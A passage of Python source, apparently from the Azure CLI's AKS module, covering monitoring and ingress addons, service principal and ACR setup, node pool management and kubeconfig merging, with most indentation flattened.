workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_shared:
addon_profile.config[CONST_INGRESS_APPGW_SHARED] = "true"
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
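    """Return the resource ID of the default Log Analytics workspace for the resource
    group's region, creating the default resource group and workspace if needed."""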
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
    # log analytics only supports the China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
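    """Deploy the ContainerInsights solution into the Log Analytics workspace referenced by
    the monitoring addon profile. No-op if the addon is disabled."""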
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
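    """Return service principal credentials for the cluster: reuse the ones passed in or
    cached in aksServicePrincipal.json, otherwise create a new service principal (with a
    generated client secret) and persist it for later runs."""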
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
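    """Validate min-count/max-count against --enable-cluster-autoscaler and node-count, and
    set the autoscaler fields on the agent pool profile when the flag is enabled."""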
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count can only be used together with --enable-cluster-autoscaler')
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
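    """Resolve the ACR by resource ID or by name across resource groups, then create (or,
    with detach=True, delete) the 'acrpull' role assignment for the given client ID."""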
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
public_ip_per_vm=False,
labels=None,
no_wait=False):
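    """Add a new node pool to the cluster, rejecting duplicate names and applying taints,
    priority/spot settings, autoscaler flags and OS disk size before creating it."""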
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
                raise CLIError('Invalid taint. Expected a value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
node_taints=taints_array,
scale_set_priority=priority,
enable_node_public_ip=public_ip_per_vm
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
no_wait=False):
update_flags = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_flags != 1:
if update_flags != 0 or tags is None:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_shared=False, appgw_watch_namespace=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
service_principal_client_id = instance.service_principal_profile.client_id
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_shared=appgw_shared, appgw_watch_namespace=appgw_watch_namespace, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
if CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles:
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
appgw_id = instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
from msrestazure.tools import parse_resource_id, resource_id
appgw_id_dict = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=appgw_id_dict["subscription"], resource_group=appgw_id_dict["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_client_id, scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
subnet_id = instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_SUBNET_ID]
from msrestazure.tools import parse_resource_id, resource_id
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_client_id, scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_shared=False,
appgw_watch_namespace=None,
no_wait=False): # pylint: disable=unused-argument
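    """Enable or disable the requested addons on the ManagedCluster instance, applying
    addon-specific configuration (monitoring workspace, virtual-node subnet,
    ingress-appgw settings) before returning the updated instance."""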
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
elif addon.lower() == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_shared:
addon_profile.config[CONST_INGRESS_APPGW_SHARED] = "true"
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
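# Merge a single kubeconfig section ('clusters', 'users' or 'contexts') from `addition` into
# `existing`. Entries with the same name are replaced when `replace` is set or the entries are
# identical; otherwise the user is prompted before overwriting.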
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
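# Load a kubeconfig file into a dict, converting missing-file and YAML parse errors into CLIError.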
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
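# Merge the kubeconfig in `addition_file` into `existing_file`: optionally rename the context,
# keep admin contexts distinct by suffixing "-admin", merge the clusters/users/contexts sections,
# and warn if the resulting file is not restricted to owner read/write permissions.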
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
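# Build a CloudStorageAccount data-plane client from the account name, key or SAS token passed in kwargs.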
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
